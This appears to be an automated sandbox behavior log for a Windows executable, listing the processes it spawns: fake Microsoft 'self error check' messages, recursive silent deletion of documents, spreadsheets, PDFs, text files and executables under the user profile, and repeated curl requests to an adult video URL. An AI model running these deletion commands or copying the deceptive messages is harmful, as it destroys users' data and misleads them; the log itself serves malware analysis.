Source: unknown | Process created: C:\Users\user\Desktop\Z0hOr2pD7k.exe 'C:\Users\user\Desktop\Z0hOr2pD7k.exe' | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo Microsoft Windows 10 self error check has been ready... | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo Copyright (C) 2003-2015 Microsoft Corporation | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo Copyright (C) 2003-2021 Adobe Corporation | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo DO NOT STOP THE PROCESS | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo Wait a minute... | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c @echo OFF | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.doc c:\users\%username%\ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.docm c:\users\%username%\ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.docx c:\users\%username%\ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dot c:\users\%username%\ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotm c:\users\%username%\ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotx c:\users\%username%\ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.pdf c:\users\%username%\ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.csv c:\users\%username%\ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.xls c:\users\%username%\ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.xlsx c:\users\%username%\ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.xlsm c:\users\%username%\ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.ppt c:\users\%username%\ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.pptx c:\users\%username%\ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.pptm c:\users\%username%\ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jtdc c:\users\%username%\ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jttc c:\users\%username%\ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jtd c:\users\%username%\ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jtt c:\users\%username%\ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.txt c:\users\%username%\ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.exe c:\users\%username%\ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.log c:\users\%username%\ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo Microsoft Windows 10 self error check has been ready... | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo Copyright (C) 2003-2015 Microsoft Corporation | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo Copyright (C) 2003-2021 Adobe Corporation | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo DO NOT STOP THE PROCESS | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo Wait a minute... | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c @echo OFF | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.doc c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.docm c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.docx c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dot c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotm c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotx c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.pdf c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.csv c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.xls c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.xlsx c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.xlsm c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.ppt c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.pptx c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.pptm c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jtdc c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jttc c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jtd c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jtt c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.txt c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.exe c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.log c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dot c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotm c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotx c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
